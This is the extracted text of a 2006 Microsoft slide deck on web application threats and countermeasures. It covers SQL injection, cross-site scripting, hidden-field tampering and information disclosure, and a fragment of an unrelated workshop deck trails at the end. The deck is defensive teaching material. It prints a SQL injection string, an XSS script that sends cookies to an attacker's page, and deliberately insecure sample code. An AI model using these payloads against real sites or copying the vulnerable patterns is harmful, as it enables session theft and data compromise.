Security: Threats and Countermeasures. Stanley Tan Academic Program Manager Microsoft Singapore

Size: px

Start display at page:

Download "Security: Threats and Countermeasures. Stanley Tan Academic Program Manager Microsoft Singapore"

Della Poole
5 years ago
Views:

1 Security: Threats and Countermeasures Stanley Tan Academic Program Manager Microsoft Singapore

2 Session Agenda Types of threats Threats against the application Countermeasures against the threats

3 Types of Threats Threats against the network Spoofed packets, etc. Network Host Application Threats against the host Buffer overflows, illicit paths, etc. Threats against the application SQL injection, XSS, input tampering, etc.

4 Threats Against the Application Threat SQL injection Cross-site scripting Hidden-field tampering Eavesdropping Session hijacking Identity spoofing Information disclosure Examples Including a DROP TABLE command in text typed into an input field Using malicious client-side script to steal cookies Maliciously changing the value of a hidden field Using a packet sniffer to steal passwords and cookies from traffic on unencrypted connections Using a stolen session ID cookie to access someone else's session state Using a stolen forms authentication cookie to pose as another user Allowing client to see a stack trace when an unhandled exception occurs i frame=true#c _004

5 SQL Injection Exploits applications that use external input in database commands Input from <form> fields Input from query strings The technique: Find a <form> field or query string parameter used to generate SQL commands Submit input that modifies the commands Compromise, corrupt, and destroy data

6 SQL Injection

7 How SQL Injection Works Model Query SELECT COUNT (*) FROM Users WHERE UserName= Jeff AND Password= imbatman Malicious Query SELECT COUNT (*) FROM Users WHERE UserName= or 1=1-- AND Password= "or 1=1" matches every record in the table "--" comments out the remainder of the query

8 Accessing Data Securely Use stored procedures or parameterized commands in lieu of dynamic SQL commands Never use sa to access Web databases Store connection strings securely Apply administrative protections to SQL Server 8 Optionally use SSL/TLS or IPSec to secure the connection to the database server 2,9 i

9 Dynamic SQL Commands Vulnerable to SQL injection attacks // DANGER! User input used to generate database query string sql = String.Format ("select count (*) " + "from users where username=\'{0}\' and cast " + "(password as varbinary)=cast (\'{1}\' as " + varbinary)", username, password); SqlCommand command = new SqlCommand (sql, connection); int count = (int) command.executescalar ();

10 Parameterized Commands Less vulnerable to SQL injection attacks // BETTER: Input passed to parameterized command SqlCommand command = new SqlCommand ("select count (*) from users where " + "username=@username and cast (password as " + "varbinary)=cast (@password as varbinary)", connection); command.parameters.add ("@username", SqlDbType.VarChar).Value = username; command.parameters.add ("@password", SqlDbType.VarChar).Value = password; int count = (int) command.executescalar ();

11 YASID Why you really want to secure yourself against SQL injection attacks

Cross-Site Scripting (XSS) Exploits applications that echo raw, unfiltered input to Web pages Input from <form> fields Input from query strings The technique: Find a <form> field

12 Cross-Site Scripting (XSS) Exploits applications that echo raw, unfiltered input to Web pages Input from <form> fields Input from query strings The technique: Find a <form> field or query string parameter whose value is echoed to the Web page Enter malicious script and get an unwary user to navigate to the infected page Steal cookies, deface and disable sites

How Cross-Site Scripting Works URL of the site targeted by the attack <a href="http:// /Search.aspx? Search=<script language='javascript'> document.location.

13 How Cross-Site Scripting Works URL of the site targeted by the attack <a href=" /Search.aspx? Search=<script language='javascript'> document.location.replace (' Cookie= + document.cookie); </script>"> </a> Query string contains embedded JavaScript that redirects to attacker s page and transmits cookies issued by Search.aspx in a query string

14 Cross-Site Scripting

15 Validating Input Filter potentially injurious characters and strings HTML-encode all input echoed to a Web page Use "safe" character encodings <globalization requestencoding="iso " responseencoding="iso " /> Avoid using file names as input if possible i frame=true#c _006

Anti-XSS Library Download from MSDN: http://www.microsoft.

16 Anti-XSS Library Download from MSDN: ils.aspx?familyid=9a2b9c92-7ad9-496c- 9A89-AF08DE2E5982&displaylang=en The Anti-Cross Site Scripting Library can be used to provide comprehensive protection to Web-based applications against Cross-Site Scripting (XSS) attacks.

17 Input Validation Why you shouldn t use file names as input

Hidden-Field Tampering HTTP is a stateless protocol No built-in way to persist data from one request to the next People are stateful beings Want data persisted

18 Hidden-Field Tampering HTTP is a stateless protocol No built-in way to persist data from one request to the next People are stateful beings Want data persisted between requests Shopping carts, user preferences, etc. Web developers sometimes use hidden fields to persist data between requests Hidden fields are not really hidden!

19 How HF Tampering Works Page contains this <input type= hidden name="price" value="$10,000"> Postback data should contain this price="$10,000" Instead it contains this price="$1" type="hidden" prevents the field from being seen on the page but not in View Source

20 Information Disclosure Which is the better error message?

21 Information Disclosure

22 This is Insecure Code! <html> <body> <form runat="server"> <asp:textbox ID="Input" runat="server" /> <asp:button Text="Click Me" OnClick="OnSubmit" runat="server" /> <asp:label ID="Output" runat="server" /> </form> </body> </html> <script language="c#" runat="server"> void OnSubmit (Object sender, EventArgs e) { Output.Text = "Hello, " + Input.Text; } </script>

23 Why is This Code Insecure? <html> <body> <form runat="server"> <asp:textbox ID="Input" runat="server" /> <asp:button Text="Click Me" OnClick="OnSubmit" runat="server" /> <asp:label ID="Output" runat="server" /> </form> </body> </html> <script language="c#" runat="server"> void OnSubmit (Object sender, EventArgs e) { Output.Text = "Hello, " + Input.Text; } </script> Input is echoed to page without HTML encoding Input is neither validated nor constrained; user can type anything!

2006 Microsoft Corporation. All rights reserved.

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang WEB SECURITY WORKSHOP TEXSAW 2014 Presented by Solomon Boyd and Jiayang Wang Introduction and Background Targets Web Applications Web Pages Databases Goals Steal data Gain access to system Bypass authentication